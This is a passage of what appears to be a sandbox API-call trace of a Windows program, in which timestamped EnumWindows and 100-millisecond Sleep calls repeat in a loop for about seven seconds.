(lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.056] Sleep (dwMilliseconds=0x64) [0236.061] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.062] Sleep (dwMilliseconds=0x64) [0236.064] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.064] Sleep (dwMilliseconds=0x64) [0236.083] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.084] Sleep (dwMilliseconds=0x64) [0236.111] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.112] Sleep (dwMilliseconds=0x64) [0236.213] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.213] Sleep (dwMilliseconds=0x64) [0236.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.291] Sleep (dwMilliseconds=0x64) [0236.404] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.404] Sleep (dwMilliseconds=0x64) [0236.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.482] Sleep (dwMilliseconds=0x64) [0236.522] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.523] Sleep (dwMilliseconds=0x64) [0236.571] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.571] Sleep (dwMilliseconds=0x64) [0236.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.613] Sleep (dwMilliseconds=0x64) [0236.651] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.652] Sleep (dwMilliseconds=0x64) [0236.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.661] Sleep (dwMilliseconds=0x64) [0236.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.667] Sleep (dwMilliseconds=0x64) [0236.675] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.675] Sleep (dwMilliseconds=0x64) [0236.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.679] Sleep (dwMilliseconds=0x64) [0236.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.683] Sleep (dwMilliseconds=0x64) [0236.699] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.699] Sleep (dwMilliseconds=0x64) [0236.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.717] Sleep (dwMilliseconds=0x64) [0236.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.725] Sleep (dwMilliseconds=0x64) [0236.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.765] Sleep (dwMilliseconds=0x64) [0236.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.845] Sleep (dwMilliseconds=0x64) [0236.920] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.920] Sleep (dwMilliseconds=0x64) [0237.003] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.003] Sleep (dwMilliseconds=0x64) [0237.089] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.090] Sleep (dwMilliseconds=0x64) [0237.131] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.132] Sleep (dwMilliseconds=0x64) [0237.190] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.191] Sleep (dwMilliseconds=0x64) [0237.252] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.253] Sleep (dwMilliseconds=0x64) [0237.272] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.273] Sleep (dwMilliseconds=0x64) [0237.279] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.280] Sleep (dwMilliseconds=0x64) [0237.289] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.289] Sleep (dwMilliseconds=0x64) [0237.292] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.292] Sleep (dwMilliseconds=0x64) [0237.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.298] Sleep (dwMilliseconds=0x64) [0237.302] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.302] Sleep (dwMilliseconds=0x64) [0237.308] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.309] Sleep (dwMilliseconds=0x64) [0237.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.313] Sleep (dwMilliseconds=0x64) [0237.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.331] Sleep (dwMilliseconds=0x64) [0237.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.336] Sleep (dwMilliseconds=0x64) [0237.360] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.361] Sleep (dwMilliseconds=0x64) [0237.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.428] Sleep (dwMilliseconds=0x64) [0237.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.507] Sleep (dwMilliseconds=0x64) [0237.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.595] Sleep (dwMilliseconds=0x64) [0237.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.694] Sleep (dwMilliseconds=0x64) [0237.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.773] Sleep (dwMilliseconds=0x64) [0237.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.814] Sleep (dwMilliseconds=0x64) [0237.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.853] Sleep (dwMilliseconds=0x64) [0237.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.886] Sleep (dwMilliseconds=0x64) [0237.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.889] Sleep (dwMilliseconds=0x64) [0237.893] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.893] Sleep (dwMilliseconds=0x64) [0237.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.897] Sleep (dwMilliseconds=0x64) [0237.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.900] Sleep (dwMilliseconds=0x64) [0237.903] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.904] Sleep (dwMilliseconds=0x64) [0237.908] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.908] Sleep (dwMilliseconds=0x64) [0237.912] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.913] Sleep (dwMilliseconds=0x64) [0237.942] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.942] Sleep (dwMilliseconds=0x64) [0237.970] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0237.970] Sleep (dwMilliseconds=0x64) [0238.076] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.076] Sleep (dwMilliseconds=0x64) [0238.206] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.207] Sleep (dwMilliseconds=0x64) [0238.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.304] Sleep (dwMilliseconds=0x64) [0238.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.387] Sleep (dwMilliseconds=0x64) [0238.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.428] Sleep (dwMilliseconds=0x64) [0238.469] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.469] Sleep (dwMilliseconds=0x64) [0238.509] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.509] Sleep (dwMilliseconds=0x64) [0238.550] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.551] Sleep (dwMilliseconds=0x64) [0238.597] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.598] Sleep (dwMilliseconds=0x64) [0238.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.628] Sleep (dwMilliseconds=0x64) [0238.636] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.637] Sleep (dwMilliseconds=0x64) [0238.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.640] Sleep (dwMilliseconds=0x64) [0238.643] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.644] Sleep (dwMilliseconds=0x64) [0238.651] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.651] Sleep (dwMilliseconds=0x64) [0238.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.654] Sleep (dwMilliseconds=0x64) [0238.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.657] Sleep (dwMilliseconds=0x64) [0238.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.660] Sleep (dwMilliseconds=0x64) [0238.664] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.664] Sleep (dwMilliseconds=0x64) [0238.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.669] Sleep (dwMilliseconds=0x64) [0238.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.674] Sleep (dwMilliseconds=0x64) [0238.677] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.677] Sleep (dwMilliseconds=0x64) [0238.680] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.680] Sleep (dwMilliseconds=0x64) [0238.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.684] Sleep (dwMilliseconds=0x64) [0238.690] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.690] Sleep (dwMilliseconds=0x64) [0238.693] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.693] Sleep (dwMilliseconds=0x64) [0238.696] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.696] Sleep (dwMilliseconds=0x64) [0238.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.702] Sleep (dwMilliseconds=0x64) [0238.706] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.706] Sleep (dwMilliseconds=0x64) [0238.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.709] Sleep (dwMilliseconds=0x64) [0238.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.717] Sleep (dwMilliseconds=0x64) [0238.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.727] Sleep (dwMilliseconds=0x64) [0238.798] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.798] Sleep (dwMilliseconds=0x64) [0238.875] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.875] Sleep (dwMilliseconds=0x64) [0238.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0238.953] Sleep (dwMilliseconds=0x64) [0239.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.007] Sleep (dwMilliseconds=0x64) [0239.110] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.111] Sleep (dwMilliseconds=0x64) [0239.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.298] Sleep (dwMilliseconds=0x64) [0239.345] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.346] Sleep (dwMilliseconds=0x64) [0239.354] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.354] Sleep (dwMilliseconds=0x64) [0239.363] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.363] Sleep (dwMilliseconds=0x64) [0239.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.366] Sleep (dwMilliseconds=0x64) [0239.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.372] Sleep (dwMilliseconds=0x64) [0239.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.378] Sleep (dwMilliseconds=0x64) [0239.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.382] Sleep (dwMilliseconds=0x64) [0239.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.387] Sleep (dwMilliseconds=0x64) [0239.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.390] Sleep (dwMilliseconds=0x64) [0239.392] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.392] Sleep (dwMilliseconds=0x64) [0239.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.395] Sleep (dwMilliseconds=0x64) [0239.397] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.397] Sleep (dwMilliseconds=0x64) [0239.407] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.407] Sleep (dwMilliseconds=0x64) [0239.410] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.411] Sleep (dwMilliseconds=0x64) [0239.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.414] Sleep (dwMilliseconds=0x64) [0239.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.419] Sleep (dwMilliseconds=0x64) [0239.422] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.423] Sleep (dwMilliseconds=0x64) [0239.425] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.425] Sleep (dwMilliseconds=0x64) [0239.428] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.429] Sleep (dwMilliseconds=0x64) [0239.477] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.477] Sleep (dwMilliseconds=0x64) [0239.520] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.520] Sleep (dwMilliseconds=0x64) [0239.559] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.559] Sleep (dwMilliseconds=0x64) [0239.602] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.603] Sleep (dwMilliseconds=0x64) [0239.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.640] Sleep (dwMilliseconds=0x64) [0239.678] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.679] Sleep (dwMilliseconds=0x64) [0239.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.692] Sleep (dwMilliseconds=0x64) [0239.696] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.696] Sleep (dwMilliseconds=0x64) [0239.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.702] Sleep (dwMilliseconds=0x64) [0239.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.708] Sleep (dwMilliseconds=0x64) [0239.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.730] Sleep (dwMilliseconds=0x64) [0239.760] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.761] Sleep (dwMilliseconds=0x64) [0239.804] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.805] Sleep (dwMilliseconds=0x64) [0239.878] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.878] Sleep (dwMilliseconds=0x64) [0239.993] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0239.993] Sleep (dwMilliseconds=0x64) [0240.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.092] Sleep (dwMilliseconds=0x64) [0240.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.136] Sleep (dwMilliseconds=0x64) [0240.202] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.202] Sleep (dwMilliseconds=0x64) [0240.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.245] Sleep (dwMilliseconds=0x64) [0240.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.284] Sleep (dwMilliseconds=0x64) [0240.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.327] Sleep (dwMilliseconds=0x64) [0240.336] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.337] Sleep (dwMilliseconds=0x64) [0240.341] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.341] Sleep (dwMilliseconds=0x64) [0240.355] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.355] Sleep (dwMilliseconds=0x64) [0240.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.361] Sleep (dwMilliseconds=0x64) [0240.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.421] Sleep (dwMilliseconds=0x64) [0240.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.429] Sleep (dwMilliseconds=0x64) [0240.433] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.433] Sleep (dwMilliseconds=0x64) [0240.436] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.436] Sleep (dwMilliseconds=0x64) [0240.474] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.474] Sleep (dwMilliseconds=0x64) [0240.514] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.515] Sleep (dwMilliseconds=0x64) [0240.554] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.555] Sleep (dwMilliseconds=0x64) [0240.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.596] Sleep (dwMilliseconds=0x64) [0240.647] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.647] Sleep (dwMilliseconds=0x64) [0240.687] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.688] Sleep (dwMilliseconds=0x64) [0240.728] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.729] Sleep (dwMilliseconds=0x64) [0240.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.769] Sleep (dwMilliseconds=0x64) [0240.794] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.794] Sleep (dwMilliseconds=0x64) [0240.828] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.828] Sleep (dwMilliseconds=0x64) [0240.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.867] Sleep (dwMilliseconds=0x64) [0240.908] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0240.908] Sleep (dwMilliseconds=0x64) [0241.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.001] Sleep (dwMilliseconds=0x64) [0241.081] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.081] Sleep (dwMilliseconds=0x64) [0241.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.124] Sleep (dwMilliseconds=0x64) [0241.184] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.185] Sleep (dwMilliseconds=0x64) [0241.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.227] Sleep (dwMilliseconds=0x64) [0241.264] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.264] Sleep (dwMilliseconds=0x64) [0241.308] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.308] Sleep (dwMilliseconds=0x64) [0241.322] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.322] Sleep (dwMilliseconds=0x64) [0241.326] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.327] Sleep (dwMilliseconds=0x64) [0241.329] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.329] Sleep (dwMilliseconds=0x64) [0241.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.332] Sleep (dwMilliseconds=0x64) [0241.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.335] Sleep (dwMilliseconds=0x64) [0241.338] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.339] Sleep (dwMilliseconds=0x64) [0241.346] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.346] Sleep (dwMilliseconds=0x64) [0241.348] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.348] Sleep (dwMilliseconds=0x64) [0241.353] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.354] Sleep (dwMilliseconds=0x64) [0241.358] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.358] Sleep (dwMilliseconds=0x64) [0241.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.362] Sleep (dwMilliseconds=0x64) [0241.365] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.366] Sleep (dwMilliseconds=0x64) [0241.369] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.369] Sleep (dwMilliseconds=0x64) [0241.373] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.373] Sleep (dwMilliseconds=0x64) [0241.376] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.376] Sleep (dwMilliseconds=0x64) [0241.382] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.382] Sleep (dwMilliseconds=0x64) [0241.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.386] Sleep (dwMilliseconds=0x64) [0241.409] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.410] Sleep (dwMilliseconds=0x64) [0241.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.439] Sleep (dwMilliseconds=0x64) [0241.516] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.516] Sleep (dwMilliseconds=0x64) [0241.631] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.631] Sleep (dwMilliseconds=0x64) [0241.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.713] Sleep (dwMilliseconds=0x64) [0241.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.753] Sleep (dwMilliseconds=0x64) [0241.793] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.793] Sleep (dwMilliseconds=0x64) [0241.832] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.832] Sleep (dwMilliseconds=0x64) [0241.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.875] Sleep (dwMilliseconds=0x64) [0241.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.890] Sleep (dwMilliseconds=0x64) [0241.903] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.903] Sleep (dwMilliseconds=0x64) [0241.907] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.908] Sleep (dwMilliseconds=0x64) [0241.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.910] Sleep (dwMilliseconds=0x64) [0241.912] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.913] Sleep (dwMilliseconds=0x64) [0241.915] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.915] Sleep (dwMilliseconds=0x64) [0241.919] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.919] Sleep (dwMilliseconds=0x64) [0241.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.924] Sleep (dwMilliseconds=0x64) [0241.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.939] Sleep (dwMilliseconds=0x64) [0241.942] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.942] Sleep (dwMilliseconds=0x64) [0241.946] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.947] Sleep (dwMilliseconds=0x64) [0241.950] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.950] Sleep (dwMilliseconds=0x64) [0241.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.954] Sleep (dwMilliseconds=0x64) [0241.960] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.960] Sleep (dwMilliseconds=0x64) [0241.962] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.962] Sleep (dwMilliseconds=0x64) [0241.978] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.979] Sleep (dwMilliseconds=0x64) [0241.985] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0241.985] Sleep (dwMilliseconds=0x64) [0242.069] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.069] Sleep (dwMilliseconds=0x64) [0242.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.189] Sleep (dwMilliseconds=0x64) [0242.268] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.268] Sleep (dwMilliseconds=0x64) [0242.356] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.357] Sleep (dwMilliseconds=0x64) [0242.434] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.434] Sleep (dwMilliseconds=0x64) [0242.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.478] Sleep (dwMilliseconds=0x64) [0242.521] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.522] Sleep (dwMilliseconds=0x64) [0242.557] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.558] Sleep (dwMilliseconds=0x64) [0242.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.565] Sleep (dwMilliseconds=0x64) [0242.570] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.570] Sleep (dwMilliseconds=0x64) [0242.574] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.574] Sleep (dwMilliseconds=0x64) [0242.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.579] Sleep (dwMilliseconds=0x64) [0242.582] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.583] Sleep (dwMilliseconds=0x64) [0242.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.587] Sleep (dwMilliseconds=0x64) [0242.590] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.590] Sleep (dwMilliseconds=0x64) [0242.598] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.598] Sleep (dwMilliseconds=0x64) [0242.602] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.602] Sleep (dwMilliseconds=0x64) [0242.605] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.605] Sleep (dwMilliseconds=0x64) [0242.608] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.608] Sleep (dwMilliseconds=0x64) [0242.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.611] Sleep (dwMilliseconds=0x64) [0242.615] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.615] Sleep (dwMilliseconds=0x64) [0242.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.640] Sleep (dwMilliseconds=0x64) [0242.659] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.660] Sleep (dwMilliseconds=0x64) [0242.726] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.727] Sleep (dwMilliseconds=0x64) [0242.841] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.841] Sleep (dwMilliseconds=0x64) [0242.917] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0242.918] Sleep (dwMilliseconds=0x64) [0243.029] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.029] Sleep (dwMilliseconds=0x64) [0243.125] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.126] Sleep (dwMilliseconds=0x64) [0243.211] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.211] Sleep (dwMilliseconds=0x64) [0243.255] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0243.255] Sleep (dwMilliseconds=0x64) [0243.278] EnumWindows (lpEnumFunc=0x2843dc0, 